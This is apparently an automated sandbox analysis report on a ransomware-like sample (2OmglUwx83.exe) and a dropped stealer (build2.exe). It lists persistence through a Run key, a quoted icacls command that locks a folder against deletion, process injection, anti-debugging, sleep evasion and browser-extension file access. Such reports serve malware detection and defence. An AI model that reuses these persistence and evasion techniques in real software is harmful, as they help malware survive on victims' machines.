Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\Desktop\2OmglUwx83.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize, 1_2_0040D240
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409909 GetCursorInfo,CharUpperA,GetConsoleAliasesLengthW,GetDefaultCommConfigW,GetProfileSectionA,_puts,GetFileInformationByHandle,_realloc,_realloc,_realloc,_fseek,SetCalendarInfoA,SetCalendarInfoA,SetCurrentDirectoryW,BuildCommDCBAndTimeoutsW,CreateFileW,OpenJobObjectA,WriteConsoleOutputCharacterA,MapUserPhysicalPages,AddAtomA,GetThreadPriority,GetFullPathNameA,FindNextVolumeMountPointW,FillConsoleOutputCharacterA,EnumResourceNamesW,OpenWaitableTimerW,LocalSize,_hwrite,GetPrivateProfileStructA,GetComputerNameW,EnumDateFormatsExA,GetConsoleAliasesW,GetComputerNameW,GetConsoleTitleA,GetSystemWindowsDirectoryW,SetCalendarInfoA,GetFileAttributesA,HeapFree,lstrcpyW,LocalAlloc,GetConsoleFontSize,EnumDateFormatsA,ConvertThreadToFiber,InterlockedCompareExchange,VerifyVersionInfoA,FormatMessageW,SetCommState,FindResourceA,CreateMutexA,MoveFileA,LockFileEx,ResetEvent,FindNextFileW,GetComputerNameExA,CopyFileW,FileTimeToSystemTime,EnumSystemLocalesA,GetComputerNameW,WriteConsoleA,GlobalGetAtomNameW,LoadLibraryA,SetConsoleWindowInfo,GetCPInfoExW,EnumResourceLanguagesA,TerminateThread,GetDiskFreeSpaceExW,GetPrivateProfileStructW,GetConsoleAliasW,lstrcpyA,GetOEMCP,ExitThread, 0_2_00409909
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 0000000D.00000002.651636454.000000006096F000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.647282877.0000000026C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00412440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle, 1_2_00412440
Source: C:\Users\user\Desktop\2OmglUwx83.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Users\user\Desktop\2OmglUwx83.exe Command line argument: velavedub 0_2_00409909
Source: 2OmglUwx83.exe String found in binary or memory: set-addPolicy
Source: 2OmglUwx83.exe String found in binary or memory: id-cmc-addExtensions
Source: 2OmglUwx83.exe String found in binary or memory: set-addPolicy
Source: 2OmglUwx83.exe String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 2OmglUwx83.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 2OmglUwx83.exe, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\bocepe redipov\son kihaseleyadej54\p.pdb source: build2.exe, 0000000C.00000000.393039147.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000C.00000002.412815687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000D.00000000.403227306.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe.8.dr, build2[1].exe.8.dr
Source: Binary string: C:\bukasilo15\tili 3.pdb source: 2OmglUwx83.exe
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 2OmglUwx83.exe, 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: ?"C:\bocepe redipov\son kihaseleyadej54\p.pdb source: build2.exe, 0000000C.00000000.393039147.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000C.00000002.412815687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000D.00000000.403227306.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe.8.dr, build2[1].exe.8.dr

Data Obfuscation
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Unpacked PE file: 13.2.build2.exe.60900000.1.unpack
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0040AC18 push eax; ret 0_2_0040AC36
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022B8F05 push ecx; ret 0_2_022B8F18
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00428565 push ecx; ret 1_2_00428578
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409508 LoadLibraryA,GetProcAddress,VirtualProtect, 0_2_00409508
PE file contains sections with non-standard names
Source: 2OmglUwx83.exe Static PE information: section name: .vegoda
Source: 2OmglUwx83.exe Static PE information: section name: .vujate
Source: 2OmglUwx83.exe Static PE information: section name: .kab
Source: 2OmglUwx83.exe Static PE information: section name: .gamo
Source: build2.exe.8.dr Static PE information: section name: .zonami
Source: build2.exe.8.dr Static PE information: section name: .yosozi
Source: build2.exe.8.dr Static PE information: section name: .may
Source: build2[1].exe.8.dr Static PE information: section name: .zonami
Source: build2[1].exe.8.dr Static PE information: section name: .yosozi
Source: build2[1].exe.8.dr Static PE information: section name: .may
Drops PE files
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe.vvyu (copy) Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Temp\tmpEAC.tmp Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Temp\CR_14C6C.tmp\setup.exe Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Temp\CR_14C6C.tmp\setup.exe.vvyu (copy) Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Temp\tmpEAC.tmp.vvyu (copy) Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\_readme.txt Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\_readme.txt Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Uses cacls to modify the permissions of files
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\2OmglUwx83.exe TID: 2812 Thread sleep time: -1260000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe TID: 5700 Thread sleep count: 71 > 30
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe TID: 5700 Thread sleep time: -71000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Last function: Thread delayed
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Thread delayed: delay time: 1260000 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe.vvyu (copy) Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_14C6C.tmp\setup.exe Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpEAC.tmp Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\CR_14C6C.tmp\setup.exe.vvyu (copy) Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmpEAC.tmp.vvyu (copy) Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Contains functionality to query network adapater information
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 1_2_0040E670
Source: C:\Users\user\Desktop\2OmglUwx83.exe Thread delayed: delay time: 1260000 Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\2OmglUwx83.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: 2OmglUwx83.exe, 00000008.00000003.382867470.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.616576425.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.428058702.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000002.431151606.0000000000619000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_00410160
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_0040F730
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409508 LoadLibraryA,GetProcAddress,VirtualProtect, 0_2_00409508
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_02290042 push dword ptr fs:[00000030h] 0_2_02290042
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0040F520 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040F520
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0041CCE2 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW, 0_2_0041CCE2
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 1_2_00447CAC
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_004158F0 SetUnhandledExceptionFilter, 0_2_004158F0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0040F520 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040F520
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0040E640 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040E640
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0040DAA0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040DAA0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004329EC
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_004329BB SetUnhandledExceptionFilter, 1_2_004329BB

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\2OmglUwx83.exe Memory written: C:\Users\user\Desktop\2OmglUwx83.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Memory written: C:\Users\user\Desktop\2OmglUwx83.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Memory written: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe base: 400000 value starts with: 4D5A Jump to behavior
